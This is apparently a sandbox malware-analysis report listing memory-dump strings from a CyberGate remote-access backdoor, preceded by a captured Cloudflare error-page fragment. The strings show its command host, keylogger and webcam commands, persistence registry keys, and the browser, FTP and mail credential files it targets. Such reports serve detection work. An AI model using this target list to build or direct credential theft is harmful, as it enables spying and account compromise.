dc9..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->.<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->.<head>.<title>Access denied | stats.teamextrememc.com used CloudFlare to restrict access</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />.<!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>.<!--[if lt IE 9]><script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script><![endif]-->.<!--[if gte IE 9]><!--><script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/zepto/1.0/zepto.min.js"></script><
<<
<<< skipped >>>
Map
The Backdoor connects to the servers at the following location(s):
Strings from Dumps
javaw.exe_680:
.text
`.rdata
@.data
.rsrc
/Xusage.txt
-Djava.class.path=%s
Unable to locate JRE meeting specification "%s"
1.6.0_18-b07
JRE-Version = %s, JRE-Restrict-Search = %s Selected = %s
Syntax error in version specification "%s"
Invalid or corrupt jarfile %s
Unable to access jarfile %s
-Djava.awt.headless=
-Djava.awt.headless=true
option[-] = '%s'
ignoreUnrecognized is %s,
sun.jnu.encoding
isSupported
-Dsun.java.command=
-Dsun.java.launcher=SUN_STANDARD
A %c separated list of directories, JAR archives,
load Java programming language agent, see java.lang.instrument
The default VM is %s%s
is a synonym for the "%s" VM [deprecated]
to select the "%s" VM
Usage: %s [-options] class [args...]
(to execute a class)
or %s [-options] -jar jarfile [args...]
(to execute a jar file)
Can't open %s
Could not find the main class: %s. Program will exit.
Failed to load Main Class: %s
Could not find the main class: %s. Program will exit.
argv[-] = '%s'
Apps' argc is %d
Main-Class is '%s'
Warning: %s VM not supported; %s VM will be used
Error: %s VM not supported
Error: Unable to resolve VM alias %s
Error: Corrupt jvm.cfg file; cycle in alias list.
Default VM: %s
%s requires class path specification
%s full version "%s"
Warning: %s option is no longer supported.
-Xrunhprof:cpu=old,file=java.prof
-Xrunhprof:cpu=old,file=%s
%ld micro seconds to parse jvm.cfg
name: %s vmType: %s alias: %s
name: %s vmType: %s server_class: %s
jvm.cfg[%d] = ->%s<-
Warning: unknown VM type on line %d of `%s'
Warning: missing server class VM on line %d of `%s'
Warning: missing VM alias on line %d of `%s'
Warning: missing VM type on line %d of `%s'
Warning: no leading - on line %d of `%s'
Error: could not open `%s'
\jvm.cfg
\bin\splashscreen.dll
%s\jvm.dll
%s\bin\%s\jvm.dll
Version major.minor.micro = %s.%s
Failed reading value of registry key:
Software\JavaSoft\Java Runtime Environment\%s\JavaHome
Error opening registry key 'Software\JavaSoft\Java Runtime Environment\%s'
Registry key 'Software\JavaSoft\Java Runtime Environment\CurrentVersion'
has value '%s', but '1.6' is required.
Error opening registry key 'Software\JavaSoft\Java Runtime Environment'
-Dsun.java2d.opengl
-Dsun.java2d.d3d
-Dsun.java2d.noddraw
-Dsun.awt.warmup
Unable to resolve path to current %s executable: %s
CreateProcess(%s, ...) failed: %s
ReExec Args: %s
ReExec Command: %s (%s)
ExecJRE: new: %s
ExecJRE: old: %s
Error: could not find java.dll
JRE path is %s
%s\jre\bin\java.dll
%s\bin\java.dll
Error loading: %s
CRT path is %s
\bin\msvcr71.dll
EnsureJreInstallation:%s:load failed
\bin\jkernel.dll
EnsureJreInstallation:<%s>:not found
EnsureJreInstallation:unsupported platform
Error: can't find JNI interfaces in: %s
JVM path is %s
\bin\awt.dll
\bin\java.dll
\bin\verify.dll
Error: no `%s' JVM at `%s'.
Error: no known VMs. (check for corrupt jvm.cfg file)
before: "%s"
after : "%s"
META-INF/MANIFEST.MF
1.1.3
inflate 1.1.3 Copyright 1995-1998 Mark Adler
mscoree.dll
Broken pipe
Inappropriate I/O control operation
Operation not permitted
kernel32.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
C:\BUILD_~1\jdk6_18\control\build\WINDOW~1\tmp\java\javaw\obj\javaw.pdb
RegCloseKey
RegOpenKeyExA
RegEnumKeyA
ADVAPI32.dll
USER32.dll
GetCPInfo
KERNEL32.dll
%Program Files%\Java\jre6\bin\javaw.exe
<assemblyIdentity version="6.0.180.7"
name="javaw.exe"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
3333333333330
333333333307
PP%d(jjjjj
6.0.180.7
javaw.exe
javaw.exe_680_rwx_00B70000_00218000:
\$`#\$\3
8&
\$` \$,;
svchost.exe_1592:
.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512
svchost.exe_1592_rwx_00400000_0006F000:
.idata
.rdata
P.reloc
P.rsrc
Portions Copyright (c) 1999,2003 Avenger by NhT
kernel32.dll
Kernel32.dll
ntdll.dll
789:;<&'()* ,-./12345
user32.dll
advapi32.dll
shell32.dll
shlwapi.dll
urlmon.dll
wininet.dll
Shell32.dll
lsass.exe
svchost.exe
GetProcessHeap
oleaut32.dll
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyW
RegCloseKey
GetWindowsDirectoryW
UnhookWindowsHookEx
SetWindowsHookExW
MapVirtualKeyW
GetKeyboardLayout
GetKeyState
SHDeleteKeyW
FindExecutableW
ShellExecuteW
URLDownloadToFileW
DeleteUrlCacheEntryW
GetKeyboardState
FtpPutFileW
FtpSetCurrentDirectoryW
1 1$1(1,1
S#t%dL
].hMIo
Qp.XQ5
*vjE%F
.Asj`
dT.Kv
Û7U
EsSh`V
ST%uM
%Cz)e
1]o:%d
3.nMXg
--9b}%
TcPD
%2uBa
%\K.TW
1uWkpb.nO
;.LT7
^0.BN!f`' _
.M.FQ
).sJ8
^D.SJ
yn.MQ
=js%C
.Qi/@
j.mcT
k.Am7
B^.mM:Gd
~1.ZRGY#%
vvH<
KWindows
Cm_Keylogger
x.html
explorer.exe
%USECRYPTERSETTINGS%
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
BINDERPASS
[Execute]
KeyDelBackspace
CyberGateKeylogger
explorer.exe
http://
.functions
ÞFAULTBROWSER%
%USECRYPTER%
SETTINGSPASS
\Microsoft\Windows\
CYBERGATEPASS
lala25.no-ip.biz
C:\User
InstallDir.exe
2.5.2.0
ftp.ftpserver.com
ftpuser
ftppass
Then set URL here.
calc.exe
notepad.exe
http://www.somehosting.com/tagger.php
::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}
::{031E4825-7B94-4dc3-B131-E946B44C8DD5}\{491E922F-5643-4af4-A7EB-4E7A138D8174}
::{59031a4?id=%ID%&name=%Username% @ %PCName%&version=%Version%
example@email.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo
iexplore.exe_3128:
`.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EIdCanNotBindPortInRange
EIdInvalidPortRange\wc
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStreamVCL.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdGlobal.pas
WS2_32.DLL
MSWSOCK.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
TIdSocketListWindows
TIdStackWindowsU
Kernel32.dll
EIdIPVersionUnsupportedP
127.0.0.1
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStack.pas
EIdPortRequired
EIdTCPConnectionError
EIdObjectTypeNotSupported
ftpTransfer
ftpReady
ftpAborted
PortT
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandler.pas
ClientPortMin
ClientPortMax
Port|
"EIdTransparentProxyUDPNotSupported
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandlerStack.pas
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
Password
PortD
0.0.0.1
0.0.0.0
BoundPort
DefaultPortD
TIdTCPConnection
TIdTCPConnectionX
IdTCPConnection
TIdTCPClientCustom
IdTCPClient
TIdTCPClient
TIdTCPClientH
BoundPortT
ole32.dll
EInvalidGraphicOperation
Please contact Cyber-Software support
shlwapi.dll
WbemScripting.SWbemLocator
%s\%s
SELECT * FROM %s
pathToSignedProductExe
pathToSignedReportingExe
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
OnKeyDown46g
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
TWebcam
SetupApi.dll
SetupDiOpenClassRegKey
SetupDiOpenClassRegKeyExA
SetupDiOpenClassRegKeyExW
SetupDiCreateDeviceInterfaceRegKeyA
SetupDiCreateDeviceInterfaceRegKeyW
SetupDiOpenDeviceInterfaceRegKey
SetupDiDeleteDeviceInterfaceRegKey
SetupDiCreateDevRegKeyA
SetupDiCreateDevRegKeyW
SetupDiOpenDevRegKey
SetupDiDeleteDevRegKey
CM_DEVCAP_LOCKSUPPORTED
CM_DEVCAP_EJECTSUPPORTED
PDCAP_D0_SUPPORTED
PDCAP_D1_SUPPORTED
PDCAP_D2_SUPPORTED
PDCAP_D3_SUPPORTED
PDCAP_WAKE_FROM_D0_SUPPORTED
PDCAP_WAKE_FROM_D1_SUPPORTED
PDCAP_WAKE_FROM_D2_SUPPORTED
PDCAP_WAKE_FROM_D3_SUPPORTED
PDCAP_WARM_EJECT_SUPPORTED
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
HTTP-EQUIV
()<>@,;:\"./
()<>@,;:\"/[]?=
()<>@,;:\"/[]?={}
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdThread.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdScheduler.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdServerIOHandlerSocket.pas
EIdTCPNoOnExecute
TIdTCPServer
TIdTCPServerX
IdTCPServer
OnExecute
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdSchedulerOfThread.pas
%s User
IdCustomTCPServer
TIdCustomTCPServer
DefaultPort
EIdTCPServerError
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCustomTCPServer.pas
CmdDelimiter
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCommandHandlers.pas
'TIdCmdTCPServerAfterCommandHandlerEvent
TIdCmdTCPServer
(TIdCmdTCPServerBeforeCommandHandlerEvent
IdCmdTCPServer
Displays commands that the servers supports.
TIdTCPStream
IdRead() method of TIdTCPStream class does not support seeking
TIdHTTPProxyTransferMode
TIdHTTPProxyServerContextt
TIdHTTPProxyServerContext$
TOnHTTPContextEvent
TIdHTTPProxyServerContext
TOnHTTPDocument
TIdHTTPProxyServer
OnHTTPBeforeCommand
OnHTTPResponse
OnHTTPDocument
HTTP/1.0
HTTP/1.0 200 Connection established
HNetCfg.FwMgr
HNetCfg.FwAuthorizedApplication
PSAPI.dll
TWebcamThread
Uh.Uk
789:;<&'()* ,-./12345
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
AllocateAndGetUdpExTableFromStack
SetTcpEntry
GetExtendedTcpTable
GetExtendedUdpTable
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
TSendKey
sqlite3_bind_blob
sqlite3_bind_text
sqlite3_bind_double
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_parameter_index
sqlite3_open
sqlite3_close
sqlite3_errmsg
sqlite3_free
sqlite3_prepare_v2
sqlite3_column_count
sqlite3_column_name
sqlite3_column_decltype
sqlite3_step
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_double
sqlite3_column_text
sqlite3_column_type
sqlite3_column_int64
sqlite3_finalize
sqlite3_reset
ESQLiteException
TSQLiteDatabaseD
TSQLiteTable
Failed to open database "%s" : %s
Failed to open database "%s" : unknown error
Error executing SQL
Could not prepare SQL statement
Error executing SQL statement
SQLite is Busy
SOFTWARE\Mozilla\Mozilla Firefox
SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox
SOFTWARE\Mozilla\Mozilla Firefox\
SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
1234567890.
mozsqlite3.dll
sqlite3.dll
mozcrt19.dll
msvcr100.dll
mozglue.dll
mozutils.dll
nspr4.dll
plc4.dll
plds4.dll
nssutil3.dll
nss3.dll
PK11_GetInternalKeySlot
\Mozilla\Firefox\profiles.ini
\Mozilla\Firefox\
signons.sqlite
SELECT * FROM moz_logins
encryptedPassword
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
RAS Passwords
SOFTWARE\Microsoft\Windows\CurrentVersion
Ps_Passwords
advapi32.dll
WindowsLive:name=*
\Mozilla Firefox\
MSVCR100.dll
softokn3.dll
userenv.dll
profiles.ini
\signons3.txt
\signons2.txt
\signons1.txt
\signons.txt
ps_SafariPasswordRecovery
AVURLProtocol_Classic
\Apple Computer\Preferences\keychain.plist
\Apple\Apple Application Support\CFNetwork.dll
http://
ftp://
*ftp://
https://
Shell.Application
http://cyber-sec.org/email/asp/email.php?email=
TMemoryOperation
%sysdir%\
%serverpath%\
%sysdir%
%serverpath%
Proxy Bypass
ntdll.dll
TPasswordItem
TArrayPasswod
Crypt32.dll
shell32.dll
Advapi32.dll
SOFTWARE\MOZILLA\MOZILLA FIREFOX
SOFTWARE\MOZILLA\MOZILLA FIREFOX\version.dll\Main
select * from moz_logins
Firefox
SOFTWARE\MOZILLA\MOZILLA FIREFOX\
\Flock\Browser\profiles.ini
Flock-Firefox
\1-abc\personal calendar\sqlite3.dll
\clipdiary\sqlite3.dll
\conceptworld\recentx\sqlite3.dll
\darq software\transmute\sqlite3.dll
\delphish\sqlite3.dll
\ditto\sqlite3.dll
\du meter\sqlite3.dll
\fcleaner\sqlite3.dll
\file seeker\sqlite3.dll
\flashnote\sqlite3.dll
\flashpaste\sqlite3.dll
\gorecord\sqlite3.dll
\gorecord2\sqlite3.dll
\linkcollector portable\sqlite3.dll
\ma-config.com\sqlite3.dll
\macrovirus\sqlite3.dll
\msnsniffer2\sqlite3.dll
\notecable\sqlite3.dll
\nzbleecher\sqlite3.dll
\outlook express\sqlite3.dll
\page update watcher\sqlite3.dll
\pipi\sqlite3.dll
\qloud\sqlite3.dll
\qloud\winamp\sqlite3.dll
\qloud\windows media player\sqlite3.dll
\recordtheradio\sqlite3.dll
\rightload\sqlite3.dll
\smm\funny sms10\sqlite3.dll
\smm\simple mail 7\sqlite3.dll
\spiceworks\bin\sqlite3.dll
\spyware-secure\sqlite3.dll
\timelog\sqlite3.dll
\video2webcam\sqlite3.dll
\webmarkers\sqlite3.dll
\webmediaplayer\sqlite3.dll
\windows media player\plugins\qloud\sqlite3.dll
\Mozilla Firefox\sqlite3.dll
\VirusGuardPlus\sqlite3.dll
\Safari\sqlite3.dll
\AIMP2\sqlite3.dll
\Live-Player\sqlite3.dll
\TrustedProtection\sqlite3.dll
\PCTotalDefender\sqlite3.dll
\Common Files\eEye Digital Security\Application Bus\sqlite3.dll
Windows Live Messenger
DynDNS\Updater\config.dyndns
Password=
Software\DownloadManager\Passwords
Software\DownloadManager\Passwords\
EncPassword
YLoginWnd
<Port></Port>
<Pass></Pass>
FileZilla\recentservers.xml
FileZilla\sitemanager.xml
FileZilla\filezilla.xml
<password></password>
.purple\accounts.xml
abe2869f-9b47-4cd9-a358-c22904dba7f7
trillian.ini
accounts.ini
password
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian
Trillian\trillian.exe
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
###@@@!!!
IMAP Password
IMAP Password:
POP3 Password
POP3 Password:
HNetCfg.NATUPnP
StaticPortMappingCollection
Uh%Fm
TCpuUsageU
##,##0.00
TNewFTPThreadU
TPasswordU
SHFileOperationW
.hd'n
.hd*n
%s %s
Windows NT %d.%d
%s %s Server
Unknown Platform ID (%d)
%d.%d
%s [Build: %d
- Service Pack: %s
KERNEL32.DLL
TIdTCPClientNewp
TIdTCPClientNew
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
?456789:;<=
!"#$%&'()* ,-./0123
com.apple.Safari
com.apple.Safari0123456789ABCDEF
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
IdStackWindows
Sr_StartWebcam
UrlMon
UnitWebcamAPI
IdTCPStream
IdTCPServer
Sr_Windows
Cm_Keylogger
~Sr_Ports
}Unitsndkey32
Vps_FireFox3_5
SQLiteTable3
SQLite3
Ps_IEpasswords
ps_URLHistory
FPs_PasswordRecovery
Ps_OperaPasswords
Sr_MemoryEXE
Sr_MemoryExecuteFunctions
U_GrabFirefox10
YU_GrabFirefox8
6U_GrabFirefox
\U_GrabChrome
U_GrabFirefox15
U_Grabfirefox22
{IdCmdTCPClient
SetNamedPipeHandleState
GetWindowsDirectoryW
GetProcessHeap
GetCPInfo
CreatePipe
RegQueryInfoKeyA
RegOpenKeyExW
RegOpenKeyExA
RegOpenKeyW
RegOpenKeyA
RegFlushKey
RegEnumKeyExW
RegEnumKeyExA
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyW
RegCloseKey
CryptImportKey
CryptSetKeyParam
CryptDestroyKey
SetViewportOrgEx
GdiplusShutdown
ShellExecuteW
FindExecutableW
SHDeleteKeyW
URLDownloadToFileW
keybd_event
VkKeyScanW
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExA
SetKeyboardState
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
ExitWindowsEx
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetKeyboardType
FtpPutFileW
FtpSetCurrentDirectoryW
InternetOpenUrlW
InternetOpenUrlA
HttpQueryInfoA
.idata
.rdata
P.reloc
P.rsrc
[E.MyFull
-!GA?EXE
LMsg
AVICAP32.DLL
crypt32.dll
gdi32.dll
gdiplus.dll
mpr.dll
msacm32.dll
powrprof.dll
pstorec.dll
URLMON.DLL
user32.dll
version.dll
wininet.dll
winmm.dll
wsock32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
Portugal
Turkey
WEBCAM
*<>#%"{}|\^[]`
uploadandexecute
uploadandexecuteyes|
uploadandexecuteno|
webcam|webcamstream|
webcam|webcamstop|
webcamstart
[Execute]
KeyDelBackspace
CyberGateKeylogger
software\microsoft\windows\currentversion\uninstall\
Invalid Key Name
Invalid KeyName
%Username%
%Country%
Úte%
FirstExecution
keylogger|keyloggeronlinekey|
keylogger|keyloggerativar|T|
keylogger|keyloggerativar|F|
webcamlist|
webcam
filemanager|fmsendftpyes|
filemanager|fmsendftpno|
FIREFOX2|
FIREFOX8|
FIREFOX10|
FIREFOX15|
FIREFOX22|
\Opera\Opera\wand.dat
OPERA|
\Google\Chrome\User Data\Default\Login Data
CHROME|
\Google\Chrome\User Data\Default\Web Data
getpasswords
downexec
openweb
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\
fmexecnormal
filemanager|fmexecnormal|
fmexechide
filemanager|fmexechide|
fmexecparam
filemanager|fmexecparam|F|
filemanager|fmexecparam|T|
fmsendftp
filemanager|fmsendftp|
listarportas
listarportas|listadeportasativas|
listarportasdns
listarportas|finalizarconexao|
finalizarprocessoportas
listarportas|finalizarprocessoportas|Y|
listarportas|finalizarprocessoportas|N|
tecaladoexecutar
webcamconfig
keylogger
keylogger|keyloggeronlinestart|
keylogger|keyloggeronlinestop|
keyloggerativar
keyloggerdesativar
keyloggerbaixar
keylogger|keyloggerbaixar|
keylogger|keyloggerbaixar|NOLOGS
keyloggerexcluir
keylogger|keyloggerexcluir|
keyloggeronlinestart
keyloggeronlinestop
chromepass
chromepass|
keysearch
keysearch|NO
keysearch|YES
sendkeyswindow
enviarlogskey
enviarlogskey|
rar.exe
rarreg.key
vs.vbs
bs.bat
memoryexecoperation
TeamViewer.exe
TeamViewer_Resource.dll
TV.dll
x.html
Windows 3.1
Windows 95 (Release 2)
Windows 95
Windows 98 SE
Windows 98
Windows ME
Windows 8
Windows 7
Windows Vista
Windows XP Professional x64
Windows XP Home
Windows XP Professional
Windows 2000 Professional
Windows 2008
Windows 2003 Server Datacenter
Windows 2003 Server Enterprise
Windows 2003 Server Web Edition
Windows 2003 Server
Windows Home Server
Windows 2003 Server (Release 2)
Windows 2000 Server Datacenter
Windows 2000 Server Enterprise
Windows 2000 Server Web Edition
Windows 2000 Server
Windows NT 4.0 Server Datacenter
Windows NT 4.0 Server Enterprise
Windows NT 4.0 Server Web Edition
Windows NT 4.0 Server
SelfDelete.bat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows NT\CurrentVersion\Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
explorer.exe
\Microsoft\Windows\
CYBERGATEPASS
lala25.no-ip.biz
C:\User
InstallDir.exe
ÞFAULTBROWSER%
2.5.2.0
ftp.ftpserver.com
ftpuser
ftppass
Then set URL here.
calc.exe
notepad.exe
lsass.exe
explorer.exe
svchost.exe
http://www.somehosting.com/tagger.php
::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}
::{031E4825-7B94-4dc3-B131-E946B44C8DD5}\{491E922F-5643-4af4-A7EB-4E7A138D8174}
::{59031a4?id=%ID%&name=%Username% @ %PCName%&version=%Version%
example@email.com
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt Clipboard does not support Icons/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code already exists: %s Thread must be specified for the scheduler.!You must have an OnExecute event.
Command not supported.
Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
Object type not supported.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
%s is not a valid service.
"Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported.
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid codepage (%d)-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Socket Error # %d
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d
Integer overflow Invalid floating point operation
iexplore.exe_3128_rwx_01611000_0010D000:
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EIdCanNotBindPortInRange
EIdInvalidPortRange\wc
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStreamVCL.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdGlobal.pas
WS2_32.DLL
MSWSOCK.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
TIdSocketListWindows
TIdStackWindowsU
Kernel32.dll
EIdIPVersionUnsupportedP
127.0.0.1
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\System\IdStack.pas
EIdPortRequired
EIdTCPConnectionError
EIdObjectTypeNotSupported
ftpTransfer
ftpReady
ftpAborted
PortT
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandler.pas
ClientPortMin
ClientPortMax
Port|
"EIdTransparentProxyUDPNotSupported
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdIOHandlerStack.pas
%EIdSocksUDPNotSupportedBySOCKSVersion
